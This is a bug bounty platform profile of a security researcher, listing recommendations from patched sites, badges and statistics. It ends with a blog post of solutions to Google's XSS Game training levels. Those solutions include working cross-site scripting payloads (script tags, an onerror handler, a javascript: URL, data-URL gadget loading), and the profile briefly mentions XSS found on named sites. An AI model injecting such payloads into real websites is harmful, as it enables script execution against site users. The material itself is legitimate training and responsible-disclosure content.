All Open Bug Bounty emails are sent only from openbugbounty.org domain being digitally signed. All others are fake. 
0xrocky
Top VIP Security Researcher of the Month | Security Researcher Profile
Security researcher 0xrocky has already helped fix 2469 vulnerabilities.
Researcher reputation: 190
Real name:
Michele Corrias
About me:
I got both my M.Sc. degree and B.Sc. degree in Computer Science at University of Milan (UniMi), in Italy, both with a final grade of 110/110 cum laude.
I'm a proud member of LaSER computer security lab!
Please, if you think that I have contributed to the security of your web application with my work, I would be grateful if you would like to give me a positive feedback or a recommendation here: it would help me to grow up professionally!
Contact email:
mhl [dot] crr [at] gmail [dot] com
Alternative Contacts:
< LinkedIn
< Twitter
Certifications & Diplomas:
> M.Sc. Degree in Computer Science
> B.Sc. Degree in Computer Science
> High School Diploma
Experience in Application Security
3-5 years
Award / Bug Bounty I prefer:
A thanksgiving and a public recommendation in my researcher profile will be really appreciated but if you would like I'm also open to:
- donations/vouchers
- swag (cups...)
- kudos
- hall of fame
Halls of Fame:
* Fastweb
* Virgilio (Italiaonline)
* Ryanair
* OpenBugBounty: TOP-50 Researchers All Time & TOP-50 Researchers Last Month
Ethics and Rules:
Michele Corrias is required to abide by the ethics and rules of the Open Bug Bounty project. If you reasonably believe that rules are not respected, please report this to us.
Recommendations and Acknowledgements
6 September, 2021
robystefanini R.Stefanini from Feedaty:| Thanks a lot 0xrocky for identifying the vulnerabilities XSS and informed us quickly. He has also checked our fix after release in production. Great security researcher and passionate to work with. Great good work! |
7 September, 2021 kiara_aviation Kiara Aviation from Kiara & Co:| Michele is a real security researcher! He helped us increase the web security of our web application: thanks to him we feel safer now! |
13 July, 2021 MPDL Benjamin from MPDL:| Thanks a lot 0xrocky for identifying the vulnerabilities and alert us. Great security researcher to work with. Keep up the good work! |
8 July, 2021 mauroamico mamico from unibo:| Many thanks to @0xrocky for identifying and responsibly disclosing a potential vulnerability on our site! |
12 June, 2021 darione90 Dario from Società Astronomica G.V. Schiaparelli:| Many thanks to 0xrocky for finding a vulnerability on our website! |
4 November, 2019 fabriziopandol5 fabrizio pandolfi from Minsait (Indra Company):| Thanks 0xrocky for identifying an XSS vulnerability and for letting us know and helping solve it. His collaboration was fundamental to solving our problems. Great security researcher to work with. Keep up the good work! |
18 October, 2019 Cineca1969 Press Office from Cineca:| Thank you 0xrocky for identifying a vulnerability and making us aware of it. Great security researcher to work with. Keep up the good work! |
17 October, 2019 CosimoGdM CGdM from I1G:| A kudos to 0xrocky for his professional work in not using the identified vulnerabilities and alerting us |
17 October, 2019 nickinckin Nicola Inchingolo from Arpa Puglia:| Thanks to 0xrocky for identifying the vulnerability. Now we patched the vulnerability. |
13 September, 2019 DiEsse DiEsse from Jobbydoo:| Big thanks to 0xrocky for identifying and responsibly disclosing a vulnerability on our site! |
Honor Badges
Number of Secured Websites
 |
|
|
 |
|
10+ Websites
|
50+ Websites
|
500+ Websites
|
WEB SECURITY VETERAN
1000+ Websites
|
Advanced Security Research
 |
 |
 |
 |
|
WAF Bypasser
|
CSRF Master
30+ Reports
|
AppSec Logic Master
30+ Reports
|
Fastest Fix
Fix in 24 hours
|
Outstanding Achievements
 |
 |
 |
|
|
Secured OBB
|
OBB Advocate
|
Improved OBB
|
Commitment to Remediate and Patch
 |
|
|
|
|
Patch Master
55% Patched
|
Patch Guru
65% Patched
|
Patch Lord
75% Patched
|
Recommendations and Recognition
 |
|
|
|
|
REPUTABLE
10+ Recommends
|
FAMOUS
25+ Recommends
|
GLOBALLY TRUSTED
50+ Recommends
|
Distinguished Blog Author
 |
|
|
|
|
1 Post
|
3 Posts
|
5+ Posts
|
Research Statistics
| Total reports: | 3713 |
| Total reports on VIP sites: | 166 |
| Total patched vulnerabilities: | 2469 |
| Recommendations received: | 10 |
| Active since: | 19.07.2019 |
| Top Security Researcher Awards: | 
Top Security Researcher of the Month |
| Top VIP Security Researcher Awards: | 
Top VIP Security Researcher of the Week |
Open Bug Bounty Certificate
Reported Vulnerabilities
All Submissions VIP SubmissionsFeatured Submissions
| Domain | Reported | Status | Type |
|---|
25.05.2021 Google XSS Game
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: "welcome" post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
10.02.2020 Stored XSS on h2biz.net
17.10.2019 Stored XSS
I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.
29.05.2023 
Please login via Twitter to add a recommendation